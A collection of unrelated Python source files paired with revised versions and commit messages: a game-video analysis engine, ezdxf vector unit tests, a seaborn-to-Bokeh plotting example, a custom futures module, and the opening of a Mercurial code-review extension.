context['engine']['exceptions_log'] = {}
def _exception_log_dump(self, context):
if not 'exceptions_log' in context['engine']:
self._exception_log_init(context)
if len(context['engine']['exceptions_log']) > 0:
pprint.pprint(context['engine']['exceptions_log'])
def _exception_log_append(self, context, name, text):
if not 'exceptions_log' in context['engine']:
self._exception_log_init(context)
d = context['engine']['exceptions_log']
count = d.get(name, {'count': 0})['count']
d[name] = {
'count': count + 1,
'text': text,
}
#
def on_game_individual_result(self, context):
self.session_close_wdt = context['engine']['msec'] + (20 * 1000)
def on_result_gears(self, context):
if self.session_close_wdt is not None:
self.session_close_wdt = context['engine']['msec'] + (1 * 1000)
def on_game_lost_sync(self, context):
self.session_abort()
def dprint(self, text):
print(text, file=sys.stderr)
def call_plugins(self, event_name, params=None, debug=False):
context = self.context
if debug:
self.dprint('call plug-in hook (%s):' % event_name)
for op in self.output_plugins:
if hasattr(op, event_name):
if debug:
self.dprint('Call %s' % op.__class__.__name__)
try:
if params is None:
getattr(op, event_name)(context)
else:
getattr(op, event_name)(context, params)
except:
self.dprint('%s.%s() raised a exception >>>>' %
(op.__class__.__name__, event_name))
self.dprint(traceback.format_exc())
self.dprint('<<<<<')
elif hasattr(op, 'onUncatchedEvent'):
if debug:
self.dprint(
'call plug-in hook (UncatchedEvent, %s):' % event_name)
try:
getattr(op, 'onUncatchedEvent')(event_name, context)
except:
self.dprint('%s.%s() raised a exception >>>>' %
(op.__class__.__name__, event_name))
self.dprint(traceback.format_exc())
self.dprint('<<<<<')
def call_plugins_later(self, event_name, params=None, debug=False):
self._event_queue.append((event_name, params))
def read_next_frame(self, skip_frames=0):
context = self.context
for i in range(skip_frames):
frame = self.capture.read_frame()
frame = self.capture.read_frame()
while frame is None:
self.call_plugins('on_frame_read_failed')
if self._stop:
return None, None
cv2.waitKey(1000)
frame = self.capture.read_frame()
t = self.capture.get_current_timestamp()
context['engine']['msec'] = t
context['engine']['frame'] = frame
context['engine']['preview'] = copy.deepcopy(frame)
self.call_plugins('on_debug_read_next_frame')
return frame, t
def stop(self):
self.call_plugins('on_stop')
self._stop = True
def reset(self):
# Initalize the context
self.context['game'] = {
'map': None,
'rule': None,
'won': None,
'players': None,
'kills': 0,
'dead': False,
'death_reasons': {},
'inkling_state': [None, None],
# Float values of start and end times scince the epoch in second.
# They are used with IkaUtils.GetTime.
'start_time': None,
'end_time': None,
# Int values of start and end offset times in millisecond.
# They are used with context['engine']['msec']
'start_offset_msec': None,
'end_offset_msec': None,
}
self.call_plugins('on_game_reset')
self._exception_log_init(self.context)
def create_context(self):
self.context = {
'engine': {
'engine': self,
'epoch_time': None,
'frame': None,
'msec': None,
'service': {
'call_plugins': self.call_plugins,
'call_plugins_later': self.call_plugins,
# For backward compatibility
'callPlugins': self.call_plugins,
},
'exceptions_log': {
},
},
'scenes': {
},
'config': {
},
'lobby': {
}
}
self.reset()
self.session_close_wdt = None
def session_close(self):
context = self.context
self.session_close_wdt = None
if not context['game']['end_time']:
# end_time should be initialized in GameFinish.
# This is a fallback in case GameFinish was skipped.
context['game']['end_time'] = IkaUtils.getTime(context)
context['game']['end_offset_msec'] = context['engine']['msec']
self.call_plugins('on_game_session_end')
self.reset()
def session_abort(self):
context = self.context
self.session_close_wdt = None
if not self.context['game']['end_time']:
# end_time should be initialized in GameFinish or session_close.
# This is a fallback in case they were skipped.
context['game']['end_time'] = IkaUtils.getTime(context)
context['game']['end_offset_msec'] = context['engine']['msec']
self.call_plugins('on_game_session_abort')
self.reset()
def process_scene(self, scene):
context = self.context
try:
scene.new_frame(context)
scene.match(context)
except:
if self._abort_at_scene_exception:
raise
scene_name = scene.__class__.__name__
desc = traceback.format_exc()
self.dprint('%s raised a exception >>>>' % scene_name)
self.dprint(desc)
self.dprint('<<<<<')
self._exception_log_append(context, scene_name, desc)
def find_scene_object(self, scene_class_name):
for scene in self.scenes:
if scene.__class__.__name__ == scene_class_name:
return scene
return None
def process_frame(self):
context = self.context
frame, t = self.read_next_frame()
if frame is None:
return False
context['engine']['inGame'] = \
self.find_scene_object('GameTimerIcon').match(context)
self.call_plugins('on_frame_read')
for scene in self.scenes:
self.process_scene(scene)
if self.session_close_wdt is not None:
if self.session_close_wdt < context['engine']['msec']:
self.dprint('Watchdog fired. Closing current session')
self.session_close()
key = None
self.call_plugins('on_draw_preview')
self.call_plugins('on_show_preview')
# FixMe: Since on_frame_next and on_key_press has non-standard arguments,
# self.call_plugins() doesn't work for those.
for op in self.output_plugins:
if hasattr(op, 'on_frame_next'):
try:
key = op.on_frame_next(context)
except:
pass
for op in self.output_plugins:
if hasattr(op, 'on_key_press'):
try:
op.on_key_press(context, key)
except:
pass
while len(self._event_queue) > 0:
event = self._event_queue.pop(0)
self.call_plugins(event_name=event[0], params=event[1])
def _main_loop(self):
while not self._stop:
if self._pause:
time.sleep(0.5)
continue
try:
self.process_frame()
except EOFError:
# EOF. Close session if close_session_at_eof is set.
if self.close_session_at_eof:
if self.session_close_wdt is not None:
self.dprint('Closing current session at EOF')
self.session_close()
else:
self.session_abort()
self._stop = True
cv2.destroyAllWindows()
def run(self):
try:
self._main_loop()
finally:
if self._enable_profile:
self._profile_dump()
if 1:
self._exception_log_dump(self.context)
def set_capture(self, capture):
self.capture = capture
self.context['engine']['input_class'] = self.capture.__class__.__name__
def set_epoch_time(self, epoch_time):
self.context['engine']['epoch_time'] = epoch_time
def set_plugins(self, plugins):
self.output_plugins = [self]
self.output_plugins.extend(self.scenes)
self.output_plugins.extend(plugins)
def pause(self, pause):
self._pause = pause
def _initialize_scenes(self):
self.scenes = [
scenes.GameTimerIcon(self),
scenes.GameStart(self),
scenes.GameGoSign(self),
scenes.GameKill(self),
scenes.GameDead(self),
scenes.GameOutOfBound(self),
scenes.GameFinish(self),
scenes.GameSpecialGauge(self),
scenes.GameSpecialWeapon(self),
scenes.GameRankedBattleEvents(self),
scenes.PaintScoreTracker(self),
scenes.ObjectiveTracker(self),
scenes.SplatzoneTracker(self),
scenes.InklingsTracker(self),
scenes.ResultJudge(self),
scenes.ResultDetail(self),
scenes.ResultUdemae(self),
scenes.ResultGears(self),
scenes.ResultFesta(self),
scenes.Lobby(self),
# scenes.Downie(self),
scenes.Blank(self),
]
def __init__(self, enable_profile=False, abort_at_scene_exception=False):
self._initialize_scenes()
self.output_plugins = [self]
self.last_capture = time.time() - 100
self._stop = False
self._pause = True
self._event_queue = []
self.close_session_at_eof = False
self._enable_profile = enable_profile
self._abort_at_scene_exception = abort_at_scene_exception
self.create_context()
|
import sys
import pytest
import math
from ezdxf.algebra.vector import Vector, is_close
PY3 = sys.version_info.major > 2
def test_init_no_params():
v = Vector()
assert v == (0, 0, 0)
assert v == Vector()
def test_init_one_param():
v = Vector((2, 3))
assert v == (2, 3) # z is 0.
v = Vector((2, 3, 4))
assert v == (2, 3, 4) # z is 0.
def test_init_two_params():
v = Vector(1, 2)
assert v == (1, 2) # z is 0.
v = Vector(5, 6, 7) - Vector(1, 1, 1)
assert v == (4, 5, 6)
v = Vector.from_deg_angle(0)
assert v == (1, 0)
length, angle = 7, 45
v = Vector.from_deg_angle(angle, length)
x = math.cos(math.radians(angle)) * length
y = math.sin(math.radians(angle)) * length
assert v == (x, y)
def test_init_three_params():
v = Vector(1, 2, 3)
assert v == (1, 2, 3)
def test_from_angle():
angle = math.radians(50)
length = 3.
assert Vector.from_rad_angle(angle, length) == (math.cos(angle) * length, math.sin(angle) * length, 0)
def test_vector_as_tuple():
v = Vector(1, 2, 3)
assert v[0] == 1
assert v[1] == 2
assert v[2] == 3
assert tuple(v) == (1, 2, 3)
def test_iter():
assert sum(Vector(1, 2, 3)) == 6
def test_deep_copy():
import copy
v = Vector(1, 2, 3)
l1 = [v, v, v]
l2 = copy.copy(l1)
assert l2[0] is l2[1]
assert l2[1] is l2[2]
assert l2[0] is v
l3 = copy.deepcopy(l1)
assert l3[0] is l3[1]
assert l3[1] is l3[2]
assert l3[0] is not v
def test_get_angle():
v = Vector(3, 3)
assert is_close(v.angle_deg, 45)
assert is_close(v.angle_rad, math.radians(45))
def test_spatial_angle():
v = Vector(3, 3, 0)
assert is_close(v.spatial_angle_deg, 45)
assert is_close(v.spatial_angle_rad, math.radians(45))
def test_compare_vectors():
v1 = Vector(1, 2, 3)
# compare to tuple
assert v1 == (1, 2, 3)
# compare tuple to vector
assert (1, 2, 3) == v1
v2 = Vector(2, 3, 4)
assert v2 > v1
assert v1 < v2
def test_xy():
assert Vector(1, 2, 3).xy == Vector(1, 2)
def test_is_null():
v = Vector()
assert v.is_null
v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
result = v2 - v1
assert Vector(0, 0, 0).is_null
@pytest.mark.skipif(not PY3, reason="__bool__ not supported")
def test_bool():
v = Vector()
assert bool(v) is False
v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
result = v2 - v1
assert bool(result) is False
# actual precision is abs_tol=1e-9
assert not Vector(1e-8, 0, 0).is_null
def test_magnitude():
v = Vector(3, 4, 5)
assert is_close(abs(v), 7.0710678118654755)
assert is_close(v.magnitude, 7.0710678118654755)
def test_magnitude_square():
v = Vector(3, 4, 5)
assert is_close(v.magnitude_square, 50)
def test_normalize():
v = Vector(2, 0, 0)
assert v.normalize() == (1, 0, 0)
def test_normalize_to_length():
v = Vector(2, 0, 0)
assert v.normalize(4) == (4, 0, 0)
def test_orthogonal_ccw():
v = Vector(3, 4)
assert v.orthogonal() == (-4, 3)
def test_orthogonal_cw():
v = Vector(3, 4)
assert v.orthogonal(False) == (4, -3)
def test_negative():
v = Vector(2, 3, 4)
assert -v == (-2, -3, -4)
def test_add_scalar():
v = Vector(2, 3, 4)
assert v + 3 == (5, 6, 7)
def test_iadd_scalar():
v = Vector(2, 3, 4)
v += 3
assert v == (5, 6, 7)
def test_sub_scalar():
v = Vector(2, 3, 4)
assert v - 3 == (-1, 0, 1)
def test_isub_scalar():
v = Vector(2, 3, 4)
v -= 3
assert v == (-1, 0, 1)
def test_add_vector():
v = Vector(2, 3, 4)
assert v + (7, 7, 7) == (9, 10, 11)
def test_iadd_vector():
v = Vector(2, 3, 4)
v += (7, 7, 7)
assert v == (9, 10, 11)
def test_radd_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) + v == (9, 10, 11)
def test_sub_vector():
v = Vector(2, 3, 4)
assert v - (7, 7, 7) == (-5, -4, -3)
def test_isub_vector():
v = Vector(2, 3, 4)
v -= (7, 7, 7)
assert v == (-5, -4, -3)
def test_rsub_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) - v == (5, 4, 3)
def test_mul_scalar():
v = Vector(2, 3, 4)
assert v * 2 == (4, 6, 8)
def test_imul_scalar():
v = Vector(2, 3, 4)
v *= 2
assert v == (4, 6, 8)
def test_rmul_scalar():
v = Vector(2, 3, 4)
assert 2 * v == (4, 6, 8)
def test_div_scalar():
v = Vector(2, 3, 4)
assert v / 2 == (1, 1.5, 2)
def test_idiv_scalar():
v = Vector(2, 3, 4)
v /= 2
assert v == (1, 1.5, 2)
def test_rdiv_scalar():
v = Vector(2, 3, 4)
assert 2 / v == (1, 0.66666666667, 0.5)
def test_dot_product():
v1 = Vector(2, 7, 1)
v2 = Vector(3, 9, 8)
assert is_close(v1.dot(v2), 77)
def test_angle_deg():
assert is_close(Vector(0, 1).angle_deg, 90)
assert is_close(Vector(0, -1).angle_deg, -90)
assert is_close(Vector(1, 1).angle_deg, 45)
assert is_close(Vector(-1, 1).angle_deg, 135)
def test_angle_between():
v1 = Vector(0, 1)
v2 = Vector(1, 1)
angle = v1.angle_between(v2)
assert is_close(angle, math.pi / 4)
# reverse order, same result
angle = v2.angle_between(v1)
assert is_close(angle, math.pi / 4)
def test_cross_product():
v1 = Vector(2, 7, 9)
v2 = Vector(3, 9, 1)
assert v1.cross(v2) == (-74, 25, -3)
def test_rot_z():
assert Vector(2, 2, 7).rot_z_deg(90) == (-2, 2, 7)
def test_lerp():
v1 = Vector(1, 1, 1)
v2 = Vector(4, 4, 4)
assert v1.lerp(v2, .5) == (2.5, 2.5, 2.5)
assert v1.lerp(v2, 0) == (1, 1, 1)
assert v1.lerp(v2, 1) == (4, 4, 4)
def test_replace():
v = Vector(1, 2, 3)
assert v.replace(x=7) == (7, 2, 3)
assert v.replace(y=7) == (1, 7, 3)
assert v.replace(z=7) == (1, 2, 7)
assert v.replace(x=7, z=7) == (7, 2, 7)
added Vector tuple tests
import sys
import pytest
import math
from ezdxf.algebra.vector import Vector, is_close
PY3 = sys.version_info.major > 2
def test_init_no_params():
v = Vector()
assert v == (0, 0, 0)
assert v == Vector()
def test_init_one_param():
v = Vector((2, 3))
assert v == (2, 3) # z is 0.
v = Vector((2, 3, 4))
assert v == (2, 3, 4) # z is 0.
def test_init_two_params():
v = Vector(1, 2)
assert v == (1, 2) # z is 0.
v = Vector(5, 6, 7) - Vector(1, 1, 1)
assert v == (4, 5, 6)
v = Vector.from_deg_angle(0)
assert v == (1, 0)
length, angle = 7, 45
v = Vector.from_deg_angle(angle, length)
x = math.cos(math.radians(angle)) * length
y = math.sin(math.radians(angle)) * length
assert v == (x, y)
def test_init_three_params():
v = Vector(1, 2, 3)
assert v == (1, 2, 3)
def test_from_angle():
angle = math.radians(50)
length = 3.
assert Vector.from_rad_angle(angle, length) == (math.cos(angle) * length, math.sin(angle) * length, 0)
def test_vector_as_tuple():
v = Vector(1, 2, 3)
assert v[0] == 1
assert v[1] == 2
assert v[2] == 3
assert tuple(v) == (1, 2, 3)
assert isinstance(v[:2], tuple)
assert v[:2] == (1, 2)
assert v[1:] == (2, 3)
assert isinstance(v.xyz, tuple)
assert v.xyz == (1, 2, 3)
def test_iter():
assert sum(Vector(1, 2, 3)) == 6
def test_deep_copy():
import copy
v = Vector(1, 2, 3)
l1 = [v, v, v]
l2 = copy.copy(l1)
assert l2[0] is l2[1]
assert l2[1] is l2[2]
assert l2[0] is v
l3 = copy.deepcopy(l1)
assert l3[0] is l3[1]
assert l3[1] is l3[2]
assert l3[0] is not v
def test_get_angle():
v = Vector(3, 3)
assert is_close(v.angle_deg, 45)
assert is_close(v.angle_rad, math.radians(45))
def test_spatial_angle():
v = Vector(3, 3, 0)
assert is_close(v.spatial_angle_deg, 45)
assert is_close(v.spatial_angle_rad, math.radians(45))
def test_compare_vectors():
v1 = Vector(1, 2, 3)
# compare to tuple
assert v1 == (1, 2, 3)
# compare tuple to vector
assert (1, 2, 3) == v1
v2 = Vector(2, 3, 4)
assert v2 > v1
assert v1 < v2
def test_xy():
assert Vector(1, 2, 3).xy == Vector(1, 2)
def test_is_null():
v = Vector()
assert v.is_null
v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
result = v2 - v1
assert Vector(0, 0, 0).is_null
@pytest.mark.skipif(not PY3, reason="__bool__ not supported")
def test_bool():
v = Vector()
assert bool(v) is False
v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
result = v2 - v1
assert bool(result) is False
# actual precision is abs_tol=1e-9
assert not Vector(1e-8, 0, 0).is_null
def test_magnitude():
v = Vector(3, 4, 5)
assert is_close(abs(v), 7.0710678118654755)
assert is_close(v.magnitude, 7.0710678118654755)
def test_magnitude_square():
v = Vector(3, 4, 5)
assert is_close(v.magnitude_square, 50)
def test_normalize():
v = Vector(2, 0, 0)
assert v.normalize() == (1, 0, 0)
def test_normalize_to_length():
v = Vector(2, 0, 0)
assert v.normalize(4) == (4, 0, 0)
def test_orthogonal_ccw():
v = Vector(3, 4)
assert v.orthogonal() == (-4, 3)
def test_orthogonal_cw():
v = Vector(3, 4)
assert v.orthogonal(False) == (4, -3)
def test_negative():
v = Vector(2, 3, 4)
assert -v == (-2, -3, -4)
def test_add_scalar():
v = Vector(2, 3, 4)
assert v + 3 == (5, 6, 7)
def test_iadd_scalar():
v = Vector(2, 3, 4)
v += 3
assert v == (5, 6, 7)
def test_sub_scalar():
v = Vector(2, 3, 4)
assert v - 3 == (-1, 0, 1)
def test_isub_scalar():
v = Vector(2, 3, 4)
v -= 3
assert v == (-1, 0, 1)
def test_add_vector():
v = Vector(2, 3, 4)
assert v + (7, 7, 7) == (9, 10, 11)
def test_iadd_vector():
v = Vector(2, 3, 4)
v += (7, 7, 7)
assert v == (9, 10, 11)
def test_radd_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) + v == (9, 10, 11)
def test_sub_vector():
v = Vector(2, 3, 4)
assert v - (7, 7, 7) == (-5, -4, -3)
def test_isub_vector():
v = Vector(2, 3, 4)
v -= (7, 7, 7)
assert v == (-5, -4, -3)
def test_rsub_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) - v == (5, 4, 3)
def test_mul_scalar():
v = Vector(2, 3, 4)
assert v * 2 == (4, 6, 8)
def test_imul_scalar():
v = Vector(2, 3, 4)
v *= 2
assert v == (4, 6, 8)
def test_rmul_scalar():
v = Vector(2, 3, 4)
assert 2 * v == (4, 6, 8)
def test_div_scalar():
v = Vector(2, 3, 4)
assert v / 2 == (1, 1.5, 2)
def test_idiv_scalar():
v = Vector(2, 3, 4)
v /= 2
assert v == (1, 1.5, 2)
def test_rdiv_scalar():
v = Vector(2, 3, 4)
assert 2 / v == (1, 0.66666666667, 0.5)
def test_dot_product():
v1 = Vector(2, 7, 1)
v2 = Vector(3, 9, 8)
assert is_close(v1.dot(v2), 77)
def test_angle_deg():
assert is_close(Vector(0, 1).angle_deg, 90)
assert is_close(Vector(0, -1).angle_deg, -90)
assert is_close(Vector(1, 1).angle_deg, 45)
assert is_close(Vector(-1, 1).angle_deg, 135)
def test_angle_between():
v1 = Vector(0, 1)
v2 = Vector(1, 1)
angle = v1.angle_between(v2)
assert is_close(angle, math.pi / 4)
# reverse order, same result
angle = v2.angle_between(v1)
assert is_close(angle, math.pi / 4)
def test_cross_product():
v1 = Vector(2, 7, 9)
v2 = Vector(3, 9, 1)
assert v1.cross(v2) == (-74, 25, -3)
def test_rot_z():
assert Vector(2, 2, 7).rot_z_deg(90) == (-2, 2, 7)
def test_lerp():
v1 = Vector(1, 1, 1)
v2 = Vector(4, 4, 4)
assert v1.lerp(v2, .5) == (2.5, 2.5, 2.5)
assert v1.lerp(v2, 0) == (1, 1, 1)
assert v1.lerp(v2, 1) == (4, 4, 4)
def test_replace():
v = Vector(1, 2, 3)
assert v.replace(x=7) == (7, 2, 3)
assert v.replace(y=7) == (1, 7, 3)
assert v.replace(z=7) == (1, 2, 7)
assert v.replace(x=7, z=7) == (7, 2, 7)
|
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from bokeh import mpl
from bokeh.plotting import show
# generate some random data
data = 1 + np.random.randn(20, 6)
# Use Seaborn and Matplotlib normally
sns.violinplot(data, color="Set3")
plt.title("Seaborn violin plot in Bokeh")
# Convert to interactive Bokeh plot with one command
show(mpl.to_bokeh(name="violin"))
fix seaborn example in concepts section of userguide
import seaborn as sns
from bokeh import mpl
from bokeh.plotting import output_file, show
tips = sns.load_dataset("tips")
sns.set_style("whitegrid")
ax = sns.violinplot(x="day", y="total_bill", hue="sex",
data=tips, palette="Set2", split=True,
scale="count", inner="stick")
output_file("violin.html")
show(mpl.to_bokeh())
|
import logging
from concurrent.futures import Future as PythonFuture
from concurrent.futures._base import CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, RUNNING, \
InvalidStateError
import concurrent.futures._base
LOGGER = logging.getLogger('concurrent.futures')
PRE_FINISHED = 'PRE-FINISHED'
concurrent.futures._base._STATE_TO_DESCRIPTION_MAP[PRE_FINISHED] = 'pre-finished'
concurrent.futures._base._FUTURE_STATES.append(PRE_FINISHED)
class Future(PythonFuture):
"""
A future that allows it's callback handlers to change it's result before presenting
it to the user.
Use like this:
>>> fut = Future()
>>> fut.set_running_or_notify_cancel()
>>> def transform_future(future):
>>> future.set_result(future.result() + 2)
>>> fut.add_pre_done_callback(transform_future)
>>> fut.set_result(2)
>>> assert fut.result() == 4
"""
def __init__(self):
super().__init__()
self._pre_done_callbacks = []
def add_pre_done_callback(self, fn):
"""
Attaches a callable that will be called just before the future finishes
and can change the future's result (or insert an Exception).
Args:
fn: A callable that will be called with this future as its only
argument just before the future completes or is cancelled.
"""
with self._condition:
if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
self._pre_done_callbacks.append(fn)
return
try:
fn(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def _invoke_pre_callbacks(self):
for callback in self._pre_done_callbacks:
try:
callback(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def set_result(self, result) -> None:
if self._state == PRE_FINISHED:
self._result = result
self._exception = None
else:
super().set_result(result)
def set_exception(self, exception) -> None:
if self._state == PRE_FINISHED:
self._exception = exception
self._result = None
else:
super().set_exception(exception)
def result(self, timeout=None):
if self._state == PRE_FINISHED:
return self.__get_result()
else:
return super().result(timeout)
def exception(self, timeout: None):
if self._state == PRE_FINISHED:
return self._exception
else:
return super().exception(timeout)
def set_result(self, result):
"""Sets the return value of work associated with the future.
Should only be used by Executor implementations and unit tests.
"""
if self._state == PRE_FINISHED:
self._result = result
else:
with self._condition:
if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
raise InvalidStateError('{}: {!r}'.format(self._state, self))
self._result = result
self._state = PRE_FINISHED
self._invoke_pre_callbacks()
self._state = FINISHED
for waiter in self._waiters:
waiter.add_result(self)
self._condition.notify_all()
self._invoke_callbacks()
def set_exception(self, exception):
"""Sets the result of the future as being the given exception.
Should only be used by Executor implementations and unit tests.
"""
if self._state == PRE_FINISHED:
self._exception = exception
self._result = None
else:
with self._condition:
if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
raise InvalidStateError('{}: {!r}'.format(self._state, self))
self._exception = exception
self._state = PRE_FINISHED
self._invoke_pre_callbacks()
self._state = FINISHED
for waiter in self._waiters:
waiter.add_exception(self)
self._condition.notify_all()
self._invoke_callbacks()
class WrappingFuture(Future):
"""
A Satella future wrapping an existing Python future.
Use like:
>> wrapped = WrappingFuture(existing_python_future)
"""
def __init__(self, source_future: PythonFuture):
super().__init__()
self.source_future = source_future
self.source_future.add_done_callback(self._on_future_completed)
self._old_state = source_future._state
@property
def _state(self):
if self.source_future._state == FINISHED:
return self._old_state
else:
return self.source_future._state
@_state.setter
def _state(self, v: str):
self._old_state = v
def set_running_or_notify_cancel(self) -> bool:
return self.source_future.set_running_or_notify_cancel()
def _on_future_completed(self, future: PythonFuture):
if future._exception is not None:
self.set_exception(future._exception)
else:
self.set_result(future._result)
def cancel(self) -> bool:
super().cancel()
return self.source_future.cancel()
fix futures
import logging
from concurrent.futures import Future as PythonFuture
from concurrent.futures._base import CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED
import concurrent.futures._base
try:
from concurrent.futures import InvalidStateError
except ImportError:
class InvalidStateError(Exception):
pass
LOGGER = logging.getLogger('concurrent.futures')
PRE_FINISHED = 'PRE-FINISHED'
concurrent.futures._base._STATE_TO_DESCRIPTION_MAP[PRE_FINISHED] = 'pre-finished'
concurrent.futures._base._FUTURE_STATES.append(PRE_FINISHED)
class Future(PythonFuture):
"""
A future that allows it's callback handlers to change it's result before presenting
it to the user.
Use like this:
>>> fut = Future()
>>> fut.set_running_or_notify_cancel()
>>> def transform_future(future):
>>> future.set_result(future.result() + 2)
>>> fut.add_pre_done_callback(transform_future)
>>> fut.set_result(2)
>>> assert fut.result() == 4
"""
def __init__(self):
super().__init__()
self._pre_done_callbacks = []
def add_pre_done_callback(self, fn):
"""
Attaches a callable that will be called just before the future finishes
and can change the future's result (or insert an Exception).
Args:
fn: A callable that will be called with this future as its only
argument just before the future completes or is cancelled.
"""
with self._condition:
if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
self._pre_done_callbacks.append(fn)
return
try:
fn(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def _invoke_pre_callbacks(self):
for callback in self._pre_done_callbacks:
try:
callback(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def set_result(self, result) -> None:
if self._state == PRE_FINISHED:
self._result = result
self._exception = None
else:
super().set_result(result)
def set_exception(self, exception) -> None:
if self._state == PRE_FINISHED:
self._exception = exception
self._result = None
else:
super().set_exception(exception)
def result(self, timeout=None):
if self._state == PRE_FINISHED:
return self.__get_result()
else:
return super().result(timeout)
def exception(self, timeout: None):
if self._state == PRE_FINISHED:
return self._exception
else:
return super().exception(timeout)
def set_result(self, result):
"""Sets the return value of work associated with the future.
Should only be used by Executor implementations and unit tests.
"""
if self._state == PRE_FINISHED:
self._result = result
else:
with self._condition:
if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
raise InvalidStateError('{}: {!r}'.format(self._state, self))
self._result = result
self._state = PRE_FINISHED
self._invoke_pre_callbacks()
self._state = FINISHED
for waiter in self._waiters:
waiter.add_result(self)
self._condition.notify_all()
self._invoke_callbacks()
def set_exception(self, exception):
"""Sets the result of the future as being the given exception.
Should only be used by Executor implementations and unit tests.
"""
if self._state == PRE_FINISHED:
self._exception = exception
self._result = None
else:
with self._condition:
if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
raise InvalidStateError('{}: {!r}'.format(self._state, self))
self._exception = exception
self._state = PRE_FINISHED
self._invoke_pre_callbacks()
self._state = FINISHED
for waiter in self._waiters:
waiter.add_exception(self)
self._condition.notify_all()
self._invoke_callbacks()
class WrappingFuture(Future):
"""
A Satella future wrapping an existing Python future.
Use like:
>> wrapped = WrappingFuture(existing_python_future)
"""
def __init__(self, source_future: PythonFuture):
super().__init__()
self.source_future = source_future
self.source_future.add_done_callback(self._on_future_completed)
self._old_state = source_future._state
@property
def _state(self):
if self.source_future._state == FINISHED:
return self._old_state
else:
return self.source_future._state
@_state.setter
def _state(self, v: str):
self._old_state = v
def set_running_or_notify_cancel(self) -> bool:
return self.source_future.set_running_or_notify_cancel()
def _on_future_completed(self, future: PythonFuture):
if future._exception is not None:
self.set_exception(future._exception)
else:
self.set_result(future._result)
def cancel(self) -> bool:
super().cancel()
return self.source_future.cancel()
|
#!/usr/bin/env python
#
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
from xml.etree import ElementTree as ET
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < '1.3':
msg = oldMessage
if os.access("/etc/mercurial", 0):
msg += linuxMessage
raise util.Abort(msg)
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
class CL(object):
def __init__(self, name):
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.original_author = None # None means current user
def DiskText(self):
cl = self
s = ""
if cl.original_author:
s += "Author: " + cl.original_author + "\n\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.original_author:
s += "Author: " + cl.original_author + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
return s
def PendingText(self):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.original_author:
s += "\tAuthor: " + cl.original_author + "\n"
